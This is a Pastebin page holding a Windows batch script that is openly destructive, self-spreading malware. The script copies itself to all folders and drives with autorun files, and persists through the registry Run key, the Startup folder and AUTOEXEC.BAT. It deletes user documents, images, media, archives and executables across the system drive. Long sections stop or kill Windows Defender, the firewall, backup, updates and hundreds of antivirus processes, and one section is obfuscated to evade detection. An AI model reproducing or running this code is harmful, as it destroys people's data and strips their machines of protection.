API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 24th, 2017
143
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.06 KB | None | 0 0
raw download clone embed print report
  1. @echo off
  2. ::----Infect All Folders-----::
  3. Dir %SystemRoot% /s /b > PathHost
  4. For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
  5. Del /f /s /q PathHost > Nul
  6. ::---------------------------::
  7. ::-----Infect All Drives-----::
  8. for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
  9. copy /Y %0 %%E:\
  10. echo [AutoRun] > %%E:\autorun.inf
  11. echo open="%%E:\%0" >> %%E:\autorun.inf
  12. echo action=Open folder to see files... >> %%E:\autorun.inf)
  13. ::---------------------------::
  14. ::------Run As Service-------::
  15. valinf = "rundll32_%random%_toolbar"
  16. reginf = "hklm\Software\Microsoft\Windows\CurrentVersion\Run"
  17. reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
  18. ::---------------------------::
  19. ::-----Infect "ls" CMD-----::
  20. copy %0 %windir%\system32\ls.bat
  21. ::---------------------------::
  22. ::------Copy To Startup------::
  23. copy %0 "%userprofile%\Start Menu\Programs\Startup"
  24. ::---------------------------::
  25. ::-----Infect Autoexec.bat---::
  26. echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
  27. ::---------------------------::
  28. ::-------Delete All .Vb------::
  29. DIR /S/B %SystemDrive%\*.vb >> FIleList_vb.txt
  30. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_vb.txt) do del "%%j:%%k"
  31. ::---------------------------::
  32. ::-------Delete All .Xml-----::
  33. DIR /S/B %SystemDrive%\*.xml >> FIleList_xml.txt
  34. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_xml.txt) do del "%%j:%%k"
  35. ::---------------------------::
  36. ::-------Delete All .Png-----::
  37. DIR /S/B %SystemDrive%\*.png >> FIleList_png.txt
  38. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k"
  39. ::---------------------------::
  40. ::-------Delete All .Bat-----::
  41. DIR /S/B %SystemDrive%\*.bat >> FIleList_bat.txt
  42. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_bat.txt) do del "%%j:%%k"
  43. ::---------------------------::
  44. ::-------Delete All .Doc-----::
  45. DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txt
  46. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"
  47. ::---------------------------::
  48. ::-------Delete All .Rar-----::
  49. DIR /S/B %SystemDrive%\*.rar >> FIleList_rar.txt
  50. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_rar.txt) do del "%%j:%%k"
  51. ::---------------------------::
  52. ::-------Delete All .Mp3-----::
  53. DIR /S/B %SystemDrive%\*.mp3 >> FIleList_mp3.txt
  54. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k"
  55. ::---------------------------::
  56. ::-------Delete All .Exe-----::
  57. DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
  58. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
  59. ::---------------------------::
  60. ::-------Delete All .Jpg-----::
  61. DIR /S/B %SystemDrive%\*.jpg >> FIleList_jpg.txt
  62. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_jpg.txt) do del "%%j:%%k"
  63. ::---------------------------::
  64. ::-------Delete All .Mp4-----::
  65. DIR /S/B %SystemDrive%\*.mp4 >> FIleList_mp4.txt
  66. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp4.txt) do del "%%j:%%k"
  67. ::---------------------------::
  68. ::-------Delete All .Zip-----::
  69. DIR /S/B %SystemDrive%\*.zip >> FIleList_zip.txt
  70. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_zip.txt) do del "%%j:%%k"
  71. ::---------------------------::
  72. ::-------Delete All .Txt-----::
  73. DIR /S/B %SystemDrive%\*.txt >> FIleList_txt.txt
  74. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_txt.txt) do del "%%j:%%k"
  75. ::---------------------------::
  76. ::-------Delete All .Vbs-----::
  77. DIR /S/B %SystemDrive%\*.vbs >> FIleList_vbs.txt
  78. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_vbs.txt) do del "%%j:%%k"
  79. ::---------------------------::
  80. ::-------Delete All .Gif-----::
  81. DIR /S/B %SystemDrive%\*.png >> FIleList_png.txt
  82. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k"
  83. ::---------------------------::
  84. ::-------Delete All .Pdf-----::
  85. DIR /S/B %SystemDrive%\*.pdf >> FIleList_pdf.txt
  86. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_pdf.txt) do del "%%j:%%k"
  87. ::---------------------------::
  88. ::------Delete All .Resx-----::
  89. DIR /S/B %SystemDrive%\*.resx >> FIleList_resx.txt
  90. echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_resx.txt) do del "%%j:%%k"
  91. ::---------------------------::
  92. ::--Disable Windows Defender-::
  93. net stop "WinDefend"
  94. taskkill /f /t /im "MSASCui.exe"
  95. ::---------------------------::
  96. ::-Disable Windows Security Center-::
  97. net stop "wscsvc"
  98. ::---------------------------------::
  99. ::-Disable Windows Firewall--::
  100. net stop "MpsSvc"
  101. taskkill /f /t /im "FirewallControlPanel.exe"
  102. ::---------------------------::
  103. ::-Disable Windows Backup-::
  104. net stop "SDRSVC"
  105. ::------------------------::
  106. ::--Disable Windows Search---::
  107. net stop "WSearch"
  108. ::---------------------------::
  109. ::-Disable Windows Error Reporting-::
  110. net stop "WerSvc"
  111. ::---------------------------------::
  112. ::-Disable Windows Parental Controls-::
  113. net stop "WPCSvc"
  114. ::-----------------------------------::
  115. ::---Disable Windows Update--::
  116. net stop "wuauserv"
  117. ::---------------------------::
  118. ::-------AV Kill [UD]--------::
  119. net stop “Security Center”
  120. netsh firewall set opmode mode=disable
  121. tskill /A av*
  122. tskill /A fire*
  123. tskill /A anti*
  124. cls
  125. tskill /A spy*
  126. tskill /A bullguard
  127. tskill /A PersFw
  128. tskill /A KAV*
  129. tskill /A ZONEALARM
  130. tskill /A SAFEWEB
  131. cls
  132. tskill /A OUTPOST
  133. tskill /A nv*
  134. tskill /A nav*
  135. tskill /A F-*
  136. tskill /A ESAFE
  137. tskill /A cle
  138. cls
  139. tskill /A BLACKICE
  140. tskill /A def*
  141. tskill /A kav
  142. tskill /A kav*
  143. tskill /A avg*
  144. tskill /A ash*
  145. cls
  146. tskill /A aswupdsv
  147. tskill /A ewid*
  148. tskill /A guard*
  149. tskill /A guar*
  150. tskill /A gcasDt*
  151. tskill /A msmp*
  152. cls
  153. tskill /A mcafe*
  154. tskill /A mghtml
  155. tskill /A msiexec
  156. tskill /A outpost
  157. tskill /A isafe
  158. tskill /A zap*
  159. cls
  160. tskill /A zauinst
  161. tskill /A upd*
  162. tskill /A zlclien*
  163. tskill /A minilog
  164. tskill /A cc*
  165. tskill /A norton*
  166. cls
  167. tskill /A norton au*
  168. tskill /A ccc*
  169. tskill /A npfmn*
  170. tskill /A loge*
  171. tskill /A nisum*
  172. tskill /A issvc
  173. tskill /A tmp*
  174. cls
  175. tskill /A tmn*
  176. tskill /A pcc*
  177. tskill /A cpd*
  178. tskill /A pop*
  179. tskill /A pav*
  180. tskill /A padmin
  181. cls
  182. tskill /A panda*
  183. tskill /A avsch*
  184. tskill /A sche*
  185. tskill /A syman*
  186. tskill /A virus*
  187. tskill /A realm*
  188. cls
  189. tskill /A sweep*
  190. tskill /A scan*
  191. tskill /A ad-*
  192. tskill /A safe*
  193. tskill /A avas*
  194. tskill /A norm*
  195. cls
  196. tskill /A offg*
  197. del /Q /F C:\Program Files\alwils~1\avast4\*.*
  198. del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
  199. del /Q /F C:\Program Files\kasper~1\*.exe
  200. cls
  201. del /Q /F C:\Program Files\trojan~1\*.exe
  202. del /Q /F C:\Program Files\f-prot95\*.dll
  203. del /Q /F C:\Program Files\tbav\*.dat
  204. cls
  205. del /Q /F C:\Program Files\avpersonal\*.vdf
  206. del /Q /F C:\Program Files\Norton~1\*.cnt
  207. del /Q /F C:\Program Files\Mcafee\*.*
  208. cls
  209. del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
  210. del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
  211. del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
  212. del /Q /F C:\Program Files\Norton~1\*.*
  213. cls
  214. del /Q /F C:\Program Files\avgamsr\*.exe
  215. del /Q /F C:\Program Files\avgamsvr\*.exe
  216. del /Q /F C:\Program Files\avgemc\*.exe
  217. cls
  218. del /Q /F C:\Program Files\avgcc\*.exe
  219. del /Q /F C:\Program Files\avgupsvc\*.exe
  220. del /Q /F C:\Program Files\grisoft
  221. del /Q /F C:\Program Files\nood32krn\*.exe
  222. del /Q /F C:\Program Files\nood32\*.exe
  223. cls
  224. del /Q /F C:\Program Files\nod32
  225. del /Q /F C:\Program Files\nood32
  226. del /Q /F C:\Program Files\kav\*.exe
  227. del /Q /F C:\Program Files\kavmm\*.exe
  228. del /Q /F C:\Program Files\kaspersky\*.*
  229. cls
  230. del /Q /F C:\Program Files\ewidoctrl\*.exe
  231. del /Q /F C:\Program Files\guard\*.exe
  232. del /Q /F C:\Program Files\ewido\*.exe
  233. cls
  234. del /Q /F C:\Program Files\pavprsrv\*.exe
  235. del /Q /F C:\Program Files\pavprot\*.exe
  236. del /Q /F C:\Program Files\avengine\*.exe
  237. cls
  238. del /Q /F C:\Program Files\apvxdwin\*.exe
  239. del /Q /F C:\Program Files\webproxy\*.exe
  240. del /Q /F C:\Program Files\panda software\*.*
  241. ::---------------------------::
  242. ::--------AV Kill 2----------::
  243. net stop ACKWIN32
  244. net stop ADVXDWIN
  245. net stop ALERTSVC
  246. net stop ALOGSERV
  247. net stop AMON9X
  248. net stop ANTI-TROJAN
  249. net stop ANTS
  250. net stop apvxdwin
  251. net stop ATCON
  252. net stop ATUPDATER
  253. net stop ATWATCH
  254. net stop AUTODOWN
  255. net stop AutoTrace
  256. net stop AVCONSOL
  257. net stop AVGCC32
  258. net stop AVGCTRL
  259. net stop Avgctrl
  260. net stop AVGSERV
  261. net stop AvgServ
  262. net stop AVGSERV9
  263. net stop AVGW
  264. net stop avkpop
  265. net stop AVKSERV
  266. net stop avkservice
  267. net stop avkwctl9
  268. net stop AVP32
  269. net stop AVP32
  270. net stop AVPCC
  271. net stop AVPCC
  272. net stop AVPM
  273. net stop AVPM
  274. net stop Avsched32
  275. net stop AVSYNMGR
  276. net stop AvSynMgr
  277. net stop AVWINNT
  278. net stop AVXMONITOR9X
  279. net stop AVXMONITORNT
  280. net stop AVXQUAR
  281. net stop AVXW
  282. net stop BLACKD
  283. net stop BLACKICE
  284. net stop BlackICE
  285. net stop CLAW95
  286. net stop CLAW95CF
  287. net stop CLEANER
  288. net stop CLEANER3
  289. net stop CMGRDIAN
  290. net stop CONNECTIONMONITOR
  291. net stop defscangui
  292. net stop DEFWATCH
  293. net stop DOORS
  294. net stop DVP95
  295. net stop EFPEADM
  296. net stop ETRUSTCIPE
  297. net stop EVPN
  298. net stop EXPERT
  299. net stop fameh32
  300. net stop fch32
  301. net stop fih32
  302. net stop fnrb32
  303. net stop fsaa
  304. net stop fsav32
  305. net stop fsgk32
  306. net stop fsm32
  307. net stop fsma32
  308. net stop fsmb32
  309. net stop gbmenu
  310. net stop GENERICS
  311. net stop GUARD
  312. net stop GUARDDOG
  313. net stop HELP
  314. net stop IAMAPP
  315. net stop IAMSERV
  316. net stop ICLOAD95
  317. net stop ICLOADNT
  318. net stop ICMON
  319. net stop ICSUPP95
  320. net stop ICSUPPNT
  321. net stop IFACE
  322. net stop IOMON98
  323. net stop ISRV95
  324. net stop JEDI
  325. net stop LDNETMON
  326. net stop LDPROMENU
  327. net stop LDSCAN
  328. net stop LOCKDOWN
  329. net stop LOCKDOWN2000
  330. net stop LUALL
  331. net stop LUCOMSERVER
  332. net stop MCAGENT
  333. net stop MCMNHDLR
  334. net stop MCSHIELD
  335. net stop McShield
  336. net stop MCTOOL
  337. net stop MCUPDATE
  338. net stop MCVSRTE
  339. net stop MCVSSHLD
  340. net stop MGAVRTCL
  341. net stop MGAVRTE
  342. net stop MGHTML
  343. net stop minilog
  344. net stop MONITOR
  345. net stop MOOLIVE
  346. net stop MWATCH
  347. net stop NAVAP
  348. net stop navapsvc
  349. net stop NAVAPW32
  350. net stop NAVENG
  351. net stop NAVEX15
  352. net stop NAVLU32
  353. net stop NAVW32
  354. net stop NAVWNT
  355. net stop NDD32
  356. net stop NeoWatchLog
  357. net stop NETUTILS
  358. net stop ngdbserv
  359. net stop NGServer
  360. net stop NISSERV
  361. net stop NISSERV
  362. net stop NISUM
  363. net stop NISUM
  364. net stop NMAIN
  365. net stop NORMIST
  366. net stop NPROTECT
  367. net stop NPSSVC
  368. net stop NSCHED32
  369. net stop ntrtscan
  370. net stop NTVDM
  371. net stop NTXconfig
  372. net stop NVC95
  373. net stop NVSVC32
  374. net stop NWService
  375. net stop NWTOOL16
  376. net stop PADMIN
  377. net stop pavproxy
  378. net stop PCCIOMON
  379. net stop pccntmon
  380. net stop pccwin97
  381. net stop PCCWIN98
  382. net stop pcscan
  383. net stop PERSFW
  384. net stop POP3TRAP
  385. net stop POPROXY
  386. net stop PORTMONITOR
  387. net stop PROCESSMONITOR
  388. net stop PROGRAMAUDITOR
  389. net stop PROT95
  390. net stop PVIEW95
  391. net stop RAV7
  392. net stop RAV7WIN
  393. net stop REALMON
  394. net stop RESCUE
  395. net stop RTVSCN95
  396. net stop sbserv
  397. net stop SCAN32
  398. net stop SCRSCAN
  399. net stop sharedaccess
  400. net stop SPHINX
  401. net stop SPYXX
  402. net stop SS3EDIT
  403. net stop STOPW
  404. net stop SVW3
  405. net stop SWEEP95
  406. net stop SweepNet
  407. net stop SWEEPSRV
  408. net stop SWEEPSRV.SYS
  409. net stop SweepUpdate
  410. net stop SWNETSUP
  411. net stop SymProxySvc
  412. net stop SYMTRAY
  413. net stop TFAK
  414. net stop vbcmserv
  415. net stop VbCons
  416. net stop VET32
  417. net stop VET95
  418. net stop VETTRAY
  419. net stop VPC32
  420. net stop VPTRAY
  421. net stop VSCHED
  422. net stop VSECOMR
  423. net stop VSHWIN32
  424. net stop VSMAIN
  425. net stop vsmon
  426. net stop VSMON
  427. net stop VSSTAT
  428. net stop WATCHDOG
  429. net stop WEBSCANX
  430. net stop WGFE95
  431. net stop WIMMUN32
  432. net stop WRADMIN
  433. net stop WRCTRL
  434. net stop ZAPROMINILOG
  435. net stop ZONEALARM
  436. ::---------------------------::
  437. ::-----Temporary AV Kill-----::
  438. taskkill /f /t /im ccapp
  439. taskkill /f /t /im mcdetect t
  440. taskkill /f /t /im McAfee security Center Module
  441. taskkill /f /t /im yahoomessenger /f /t
  442. taskkill /f /t /im msmsgs
  443. taskkill /f /t /im firefox
  444. taskkill /f /t /im iexplore
  445. taskkill /f /t /im _Avp32.exe
  446. taskkill /f /t /im _Avpcc.exe
  447. taskkill /f /t /im _Avpm.exe
  448. taskkill /f /t /im Agnitum Outpost Firewall
  449. taskkill /f /t /im Anti-Trojan.exe
  450. taskkill /f /t /im ANTIVIR
  451. taskkill /f /t /im Apvxdwin.exe
  452. taskkill /f /t /im ATRACK
  453. taskkill /f /t /im Autodown.exe
  454. taskkill /f /t /im AVCONSOL
  455. taskkill /f /t /im Avconsol.exe
  456. taskkill /f /t /im Ave32.exe
  457. taskkill /f /t /im Avgctrl.exe
  458. taskkill /f /t /im Avkserv.exe
  459. taskkill /f /t /im Avnt.exe
  460. taskkill /f /t /im Avp.exe
  461. taskkill /f /t /im AVP.EXE
  462. taskkill /f /t /im AVP32
  463. taskkill /f /t /im Avp32.exe
  464. taskkill /f /t /im Avpcc.exe
  465. taskkill /f /t /im Avpdos32.exe
  466. taskkill /f /t /im Avpm.exe
  467. taskkill /f /t /im Avptc32.exe
  468. taskkill /f /t /im Avpupd.exe
  469. taskkill /f /t /im Avsched32.exe
  470. taskkill /f /t /im AVSync Manager
  471. taskkill /f /t /im AVSYNMGR
  472. taskkill /f /t /im Avwin95.exe
  473. taskkill /f /t /im Avwupd32.exe
  474. taskkill /f /t /im Blackd.exe
  475. taskkill /f /t /im BLACKICE
  476. taskkill /f /t /im BlackICE Defender
  477. taskkill /f /t /im Blackice.exe
  478. taskkill /f /t /im CA Sessionwall-3
  479. taskkill /f /t /im Cfiadmin.exe
  480. taskkill /f /t /im Cfiaudit.exe
  481. taskkill /f /t /im CFINET
  482. taskkill /f /t /im Cfinet.exe
  483. taskkill /f /t /im CFINET32
  484. taskkill /f /t /im Cfinet32.exe
  485. taskkill /f /t /im Claw95.exe
  486. taskkill /f /t /im Claw95cf.exe
  487. taskkill /f /t /im Cleaner.exe
  488. taskkill /f /t /im Cleaner3.exe
  489. taskkill /f /t /im Defwatch
  490. taskkill /f /t /im Dvp95.exe
  491. taskkill /f /t /im Dvp95_0.exe
  492. taskkill /f /t /im Ecengine.exe
  493. taskkill /f /t /im eSafe Protect Desktop
  494. taskkill /f /t /im Esafe.exe
  495. taskkill /f /t /im Espwatch.exe
  496. taskkill /f /t /im eTrust EZ Firewall
  497. taskkill /f /t /im F-Agnt95.exe
  498. taskkill /f /t /im Findviru.exe
  499. taskkill /f /t /im Fprot.exe
  500. taskkill /f /t /im F-Prot.exe
  501. taskkill /f /t /im F-PROT95
  502. taskkill /f /t /im F-Prot95.exe
  503. taskkill /f /t /im Fp-Win.exe
  504. taskkill /f /t /im "Freedom 2"
  505. taskkill /f /t /im Frw.exe
  506. taskkill /f /t /im F-STOPW
  507. taskkill /f /t /im F-Stopw.exe
  508. taskkill /f /t /im GNAT Box Lite
  509. taskkill /f /t /im IAMAPP
  510. taskkill /f /t /im Iamapp.exe
  511. taskkill /f /t /im Iamserv.exe
  512. taskkill /f /t /im Ibmasn.exe
  513. taskkill /f /t /im Ibmavsp.exe
  514. taskkill /f /t /im Icload95.exe
  515. taskkill /f /t /im Icloadnt.exe
  516. taskkill /f /t /im ICMON
  517. taskkill /f /t /im Icmon.exe
  518. taskkill /f /t /im Icsupp95.exe
  519. taskkill /f /t /im Icsuppnt.exe
  520. taskkill /f /t /im Iface.exe
  521. taskkill /f /t /im Internet Alert 99
  522. taskkill /f /t /im IOMON98
  523. taskkill /f /t /im Iomon98.exe
  524. taskkill /f /t /im LOCKDOWN2000
  525. taskkill /f /t /im Lockdown2000.exe
  526. taskkill /f /t /im Look'n'Stop
  527. taskkill /f /t /im Lookout.exe
  528. taskkill /f /t /im LUALL
  529. taskkill /f /t /im Luall.exe
  530. taskkill /f /t /im LUCOMSERVER
  531. taskkill /f /t /im MCAFEE
  532. taskkill /f /t /im McAfee Firewall
  533. taskkill /f /t /im McAfee Internet Guard Dog Pro
  534. taskkill /f /t /im Moolive.exe
  535. taskkill /f /t /im Mpftray.exe
  536. taskkill /f /t /im N32scanw.exe
  537. taskkill /f /t /im NAVAPSVC
  538. taskkill /f /t /im NAVAPW32
  539. taskkill /f /t /im NAVLU32
  540. taskkill /f /t /im Navlu32.exe
  541. taskkill /f /t /im Navnt.exe
  542. taskkill /f /t /im NAVRUNR
  543. taskkill /f /t /im NAVW32
  544. taskkill /f /t /im NAVWNT
  545. taskkill /f /t /im Navwnt.exe
  546. taskkill /f /t /im NeoWatch
  547. taskkill /f /t /im NISSERV
  548. taskkill /f /t /im Nisum.exe
  549. taskkill /f /t /im NMAIN
  550. taskkill /f /t /im Nmain.exe
  551. taskkill /f /t /im Norman Personal Firewall
  552. taskkill /f /t /im Normist.exe
  553. taskkill /f /t /im NORTON
  554. taskkill /f /t /im Norton AntiVirus Server
  555. taskkill /f /t /im Norton Internet Security
  556. taskkill /f /t /im Norton Personal Firewall 2001
  557. taskkill /f /t /im Nupgrade.exe
  558. taskkill /f /t /im NVC95
  559. taskkill /f /t /im Nvc95.exe
  560. taskkill /f /t /im Outpost.exe
  561. taskkill /f /t /im Padmin.exe
  562. taskkill /f /t /im Pavcl.exe
  563. taskkill /f /t /im Pavsched.exe
  564. taskkill /f /t /im Pavw.exe
  565. taskkill /f /t /im Pc firewall
  566. taskkill /f /t /im PC Viper
  567. taskkill /f /t /im PCCIOMON
  568. taskkill /f /t /im PCCMAIN
  569. taskkill /f /t /im PCCWIN98
  570. taskkill /f /t /im Pccwin98.exe
  571. taskkill /f /t /im Pcfwallicon.exe
  572. taskkill /f /t /im Persfw.exe
  573. taskkill /f /t /im PGP Gauntlet
  574. taskkill /f /t /im POP3TRAP
  575. taskkill /f /t /im Proxy +
  576. taskkill /f /t /im PVIEW95
  577. taskkill /f /t /im Rav7.exe
  578. taskkill /f /t /im Rav7win.exe
  579. taskkill /f /t /im Rescue.exe
  580. taskkill /f /t /im RESCUE32
  581. taskkill /f /t /im SAFEWEB
  582. taskkill /f /t /im Safeweb.exe
  583. taskkill /f /t /im Scan32.exe
  584. taskkill /f /t /im Scan95.exe
  585. taskkill /f /t /im Scrscan.exe
  586. taskkill /f /t /im Serv95.exe
  587. taskkill /f /t /im Smc.exe
  588. taskkill /f /t /im SMCSERVICE
  589. taskkill /f /t /im Snort - Win32 GUI
  590. taskkill /f /t /im Snort (Intrusion Detection System)
  591. taskkill /f /t /im Sphinx.exe
  592. taskkill /f /t /im Sphinxwall
  593. taskkill /f /t /im Sweep95.exe
  594. taskkill /f /t /im Sybergen Secure Desktop
  595. taskkill /f /t /im Sybergen SyGate
  596. taskkill /f /t /im Tbscan.exe
  597. taskkill /f /t /im Tca.exe
  598. taskkill /f /t /im Tds2-98.exe
  599. taskkill /f /t /im Tds2-Nt.exe
  600. taskkill /f /t /im TermiNET
  601. taskkill /f /t /im TGB:BOB
  602. taskkill /f /t /im Tiny Personal Firewall
  603. taskkill /f /t /im Vet95.exe
  604. taskkill /f /t /im Vettray.exe
  605. taskkill /f /t /im Vscan40.exe
  606. taskkill /f /t /im Vsecomr.exe
  607. taskkill /f /t /im VSHWIN32
  608. taskkill /f /t /im Vshwin32.exe
  609. taskkill /f /t /im VSSTAT
  610. taskkill /f /t /im Vsstat.exe
  611. taskkill /f /t /im WEBSCANX
  612. taskkill /f /t /im Webscanx.exe
  613. taskkill /f /t /im WEBTRAP
  614. taskkill /f /t /im Wfindv32.exe
  615. taskkill /f /t /im Wingate
  616. taskkill /f /t /im WinProxy
  617. taskkill /f /t /im WinRoute
  618. taskkill /f /t /im WyvernWorks Firewall
  619. taskkill /f /t /im Zonealarm
  620. taskkill /f /t /im Zonealarm.exe
  621. taskkill /f /t /im AVP32
  622. taskkill /f /t /im LOCKDOWN2000
  623. taskkill /f /t /im AVP.EXE
  624. taskkill /f /t /im CFINET32
  625. taskkill /f /t /im CFINET
  626. taskkill /f /t /im ICMON
  627. taskkill /f /t /im SAFEWEB
  628. taskkill /f /t /im WEBSCANX
  629. taskkill /f /t /im ANTIVIR
  630. taskkill /f /t /im MCAFEE
  631. taskkill /f /t /im NORTON
  632. taskkill /f /t /im NVC95
  633. taskkill /f /t /im FP-WIN
  634. taskkill /f /t /im IOMON98
  635. taskkill /f /t /im PCCWIN98
  636. taskkill /f /t /im F-PROT95
  637. taskkill /f /t /im F-STOPW
  638. taskkill /f /t /im PVIEW95
  639. taskkill /f /t /im NAVWNT
  640. taskkill /f /t /im NAVRUNR
  641. taskkill /f /t /im NAVLU32
  642. taskkill /f /t /im NAVAPSVC
  643. taskkill /f /t /im NISUM
  644. taskkill /f /t /im SYMPROXYSVC
  645. taskkill /f /t /im RESCUE32
  646. taskkill /f /t /im NISSERV
  647. taskkill /f /t /im ATRACK
  648. taskkill /f /t /im IAMAPP
  649. taskkill /f /t /im LUALL
  650. taskkill /f /t /im NMAIN
  651. taskkill /f /t /im NAVW32
  652. taskkill /f /t /im NAVAPW32
  653. taskkill /f /t /im VSSTAT
  654. taskkill /f /t /im VSHWIN32
  655. taskkill /f /t /im AVSYNMGR
  656. taskkill /f /t /im AVCONSOL
  657. taskkill /f /t /im WEBTRAP
  658. taskkill /f /t /im POP3TRAP
  659. taskkill /f /t /im PCCMAIN
  660. taskkill /f /t /im PCCIOMON
  661. ::---------------------------::
  662. ::------Encrypted AV Kill----::
  663. del /F /Q %SystemDrive%\recycler\S-1-5-21-1202660629-261903793-725345543-1003\run.bat
  664. set ii=ne
  665. set ywe=st
  666. set ury=t
  667. set iej=op
  668. set jt53=Syma
  669. set o6t=nor
  670. set lyd2=fee
  671. set h3d=ton
  672. set gf45=ntec
  673. set own5=McA
  674. %ii%%ury% %ywe%%iej% "Security Center" /y
  675. %ii%%ury% %ywe%%iej% "Automatic Updates" /y
  676. %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
  677. %ii%%ury% %ywe%%iej% "SAVScan" /y
  678. %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y
  679. %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y
  680. %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
  681. %ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y
  682. %ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y
  683. %ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y
  684. %ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y
  685. cls
  686. %ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y
  687. %ii%%ury% %ywe%%iej% navapsvc /y
  688. %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
  689. %ii%%ury% %ywe%%iej% vrmonsvc /y
  690. %ii%%ury% %ywe%%iej% MonSvcNT /y
  691. %ii%%ury% %ywe%%iej% SAVScan /y
  692. %ii%%ury% %ywe%%iej% NProtectService /y
  693. %ii%%ury% %ywe%%iej% ccSetMGR /y
  694. %ii%%ury% %ywe%%iej% ccEvtMGR /y
  695. %ii%%ury% %ywe%%iej% srservice /y
  696. %ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y
  697. %ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y
  698. %ii%%ury% %ywe%%iej% MskService /y
  699. %ii%%ury% %ywe%%iej% MpfService /y
  700. %ii%%ury% %ywe%%iej% mcupdmgr.exe /y
  701. %ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y
  702. %ii%%ury% %ywe%%iej% helpsvc /y
  703. %ii%%ury% %ywe%%iej% ERSvc /y
  704. %ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y
  705. %ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y
  706. %ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y
  707. cls
  708. %ii%%ury% %ywe%%iej% ccPwdSvc /y
  709. %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
  710. %ii%%ury% %ywe%%iej% navapsvc /y
  711. %ii%%ury% %ywe%%iej% "Serv-U" /y
  712. %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
  713. %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
  714. %ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y
  715. %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y
  716. %ii%%ury% %ywe%%iej% "NAV Alert" /y
  717. %ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y
  718. cls
  719. %ii%%ury% %ywe%%iej% "McShield" /y
  720. %ii%%ury% %ywe%%iej% "DefWatch" /y
  721. %ii%%ury% %ywe%%iej% eventlog /y
  722. %ii%%ury% %ywe%%iej% InoRPC /y
  723. %ii%%ury% %ywe%%iej% InoRT /y
  724. %ii%%ury% %ywe%%iej% InoTask /y
  725. cls
  726. %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
  727. %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
  728. %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y
  729. %ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y
  730. %ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y
  731. %ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y
  732. %ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y
  733. %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y
  734. %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y
  735. %ii%%ury% %ywe%%iej% "SyGateService" /y
  736. %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
  737. cls
  738. %ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y
  739. %ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y
  740. %ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y
  741. %ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y
  742. %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
  743. %ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y
  744. cls
  745. %ii%%ury% %ywe%%iej% netsvcs
